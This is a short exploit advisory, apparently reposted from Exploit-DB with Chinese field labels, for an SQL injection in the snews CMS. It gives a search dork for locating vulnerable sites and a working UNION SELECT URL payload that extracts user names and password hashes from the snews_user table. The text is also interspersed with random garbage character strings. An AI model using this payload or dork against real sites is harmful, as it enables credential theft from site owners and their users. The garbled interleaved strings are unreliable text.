标题: CMS snews SQL Injection Vulnerability" [3 Y l, Y. S- a
作者: By onestree3 Q; k0 b. @' U) Q9 ^
下载地址 : http://snewscms.com/
4 R; F) w# d" S5 w9 m测试平台 : ubuntu 12.10 / win 76 l" @9 }! f& h7 h. A8 E- f
关键词: inurl:"tanyakan pada rumput yang bergoyang"
! H8 T/ P4 G- c3 y; C s 8 x' o/ x9 M9 A: s, S4 h
7 m1 u3 P4 r/ u+ C( U1 b
*************************************************************
3 J2 O$ J# H- C: `/ }) K 6 K r- d# ?7 U$ }0 M: d
SQL poc:& s/ G6 s* [; p4 h; S. `
1 s* M- g4 u {+ @# V
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
% f/ A, b3 @. k
4 `( h: m1 x- @8 }示例. k, }6 U3 s7 }9 e5 F
* K) ~/ e- C! q3 f( qhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
+ ^$ O1 L# h, O" I6 y& N4 r M
7 z2 U N: E/ ^6 I
: ~; O8 Q5 U, d* q致谢:7 x# G9 C+ r- D- H# i
& w; Z1 o s) @; {2 l; r% v Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
! g) K& x. H5 u4 W* Q \% ~' a- [3 p4 r; w
indonesiancoder - moeslimh4x0r - go-coder
8 B) B9 E5 q8 z5 S ! @0 ~ e) l! I4 f
spesial my hunny :*
( ]9 p: t$ i, s( o |